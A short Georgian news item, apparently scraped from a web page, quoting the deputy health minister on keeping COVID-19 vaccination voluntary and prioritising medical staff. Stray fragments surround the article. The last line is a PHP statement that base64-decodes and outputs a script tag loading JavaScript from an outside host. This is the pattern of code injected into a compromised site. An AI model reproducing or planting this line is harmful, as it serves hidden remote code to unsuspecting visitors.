celsiusi
ავერსი შნაიდერი
საქართველოს ჯანდაცვის მინისტრის პირველი მოადგილის თამარ გაბუნიას განცხადებით, ქვეყანაში ამ ეტაპზე ვაქცინაციის ნებაყოფლობითი მოდელი შენარჩუნდება. მისივე თქმით, ვაქცინის დოზები საკმარისია და განსაკუთრებით მნიშვნელოვანია, სამედიცინო პერსონალის ვაქცინაცია სწრაფად მოხდეს.
 
„ამ ეტაპზე ჩვენ მივყვებით ნებაყოფლობითი ვაქცინაციის მოდელს და ამას გავაგრძელებთ. ძალიან მნიშვნელოვანია სწრაფად მოხდეს სამედიცინო პერსონალის ვაქცინაცია. მათი ნაწილი უკვე აცრილია, ნაწილი „ფაიზერის“ ვაქცინას ელოდებოდა და ჩვენ ამ პერიოდში მაქსიმალურად შევუწყობთ ხელს, განსაკუთრებით კოვიდკლინიკებში დასაქმებულ პერსონალს და ასევე სასწრაფო გადაუდებელი სამსახურის პერსონალს, რათა მათ პრიორიტეტულად ჩაიტარონ ვაქცინაცია. დოზები საკმარისია და მნიშვნელოვანია, რომ პირველ რიგში ეს ჯგუფი აიცრას“, - განაცხადა გაბუნიამ.
1470
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");